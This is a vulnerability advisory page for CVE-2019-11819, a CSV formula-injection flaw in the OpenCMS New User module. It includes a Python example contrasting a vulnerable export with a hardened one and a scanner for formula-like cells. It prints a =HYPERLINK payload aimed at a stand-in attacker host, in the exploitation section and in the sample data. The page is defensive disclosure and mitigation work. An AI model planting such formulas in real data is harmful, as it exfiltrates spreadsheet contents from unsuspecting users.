VYPR
High severity · NVD Advisory · Published May 8, 2019 · Updated Aug 4, 2024

CVE-2019-11819

Description

Alkacon OpenCMS v10.5.4 and before is affected by CSV (aka Excel Macro) Injection in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp) via the First Name or Last Name.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Alkacon OpenCMS 10.5.4 and earlier is vulnerable to CSV injection via the First Name and Last Name fields in the New User module, enabling formula injection when exported CSV is opened.

Vulnerability

Overview

CVE-2019-11819 describes a CSV injection vulnerability in Alkacon OpenCMS versions 10.5.4 and earlier. The flaw resides in the New User module, specifically in the parameters for First Name and Last Name within the /opencms/system/workplace/admin/accounts/user_new.jsp page [3][4]. The application fails to sanitize user-supplied input before including it in exported CSV files, allowing an attacker to inject spreadsheet formulas.

Exploitation

Details

To exploit this vulnerability, an attacker needs an account that can create or edit users through the workplace administration module (the New User page sits under /opencms/system/workplace/admin/accounts/). By entering a payload such as =HYPERLINK("http://attacker-ip/path","IAmSafe") into the First Name or Last Name field, the formula is stored as an ordinary string in the user record. When an administrator or another user later exports the user list with the Export User feature, the stored value is written into the resulting CSV file verbatim [3][4]. Nothing happens on the server; the attack fires when the CSV is opened in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, which evaluates a cell beginning with = (and, depending on the application, +, -, or @) as a formula instead of displaying it as text.

Impact

Successful exploitation can lead to several outcomes depending on the spreadsheet software and user behavior. Attackers may leverage known vulnerabilities in the spreadsheet engine (e.g., CVE-2014-3524) or rely on social engineering to get the user past the security prompt that modern versions show before running external links or commands. Potential impacts include arbitrary code execution on the user's machine, exfiltration of data from the CSV file or other open spreadsheets (a HYPERLINK formula can embed cell contents in the URL it sends to the attacker's host), and further compromise of the user's system [4].

Mitigation

The GitHub Security Advisory lists 11.0.0 as the patched version of org.opencms:opencms-core, so upgrade to 11.0.0 or later. Where an upgrade is not immediately possible, neutralize exported cells on the server side: prefix any value that begins with =, +, -, @, a tab or a carriage return with a single quote so spreadsheet applications treat it as text, and audit existing user records and previously exported files for such values. On the client side, import exported CSV files with formula evaluation disabled (for example by importing the columns as text) rather than double-clicking them open. The vulnerability has been publicly disclosed and a proof of concept exists, so patching is strongly recommended [2][3][4].
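The export path described under Exploitation and the server-side neutralization recommended here, side by side, as an added Python example that is not OpenCMS code: it models an Export User action as a plain CSV writer (the real module is a JSP page), uses constructed sample records in place of OpenCMS user data, and adds a scanner that flags formula-like cells in a finished export so files produced by an unpatched instance can be audited.

```python
import csv
import io

# Leading characters that Microsoft Excel and LibreOffice Calc can treat as the
# start of a formula (the OWASP CSV-injection list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample records (not real OpenCMS data). The second user's first
# name is the payload described in the advisory; the last name shows that a
# leading "+" is enough to trigger evaluation as well.
SAMPLE_USERS = [
    {"login": "admin", "firstname": "Site", "lastname": "Admin",
     "email": "admin@example.invalid"},
    {"login": "mallory",
     "firstname": '=HYPERLINK("http://attacker-ip/path","IAmSafe")',
     "lastname": "+1+1", "email": "mallory@example.invalid"},
]
COLUMNS = ("login", "firstname", "lastname", "email")


def is_formula_like(value):
    """True when a spreadsheet would evaluate the cell rather than display it."""
    s = str(value)
    return bool(s) and s[0] in FORMULA_TRIGGERS


def neutralize_cell(value):
    """Force text interpretation by prefixing a single quote; content is kept verbatim.
    Trade-off: genuine negative numbers ("-5") are prefixed too, so keep numeric
    columns numeric at the type level instead of routing them through here."""
    s = str(value)
    return "'" + s if is_formula_like(s) else s


def export_users_vulnerable(users):
    """Mirrors the flaw: stored names go into the CSV untouched."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(COLUMNS)
    for user in users:
        writer.writerow([user[col] for col in COLUMNS])
    return buf.getvalue()


def export_users_hardened(users):
    """Same export with every cell neutralized before it reaches the file."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(COLUMNS)
    for user in users:
        writer.writerow([neutralize_cell(user[col]) for col in COLUMNS])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan an export (or any CSV) and return (row, column, value) for risky cells.
    The csv reader undoes the writer's quoting, so the check sees the raw value."""
    hits = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for col_no, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((row_no, col_no, cell))
    return hits


if __name__ == "__main__":
    unsafe = export_users_vulnerable(SAMPLE_USERS)
    print(unsafe)
    print("risky cells in vulnerable export:", find_formula_cells(unsafe))
    safe = export_users_hardened(SAMPLE_USERS)
    print(safe)
    print("risky cells in hardened export:", find_formula_cells(safe))
```

The scanner flags the HYPERLINK payload and the +1+1 cell in the vulnerable export and nothing in the hardened one. The apostrophe prefix is the standard neutralization, but some spreadsheet versions display it literally when the file is opened as CSV rather than typed in; that visible quote is the accepted cost of not executing the cell.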

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                    Ecosystem   Affected versions   Patched versions
org.opencms:opencms-core   Maven       < 11.0.0            11.0.0

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.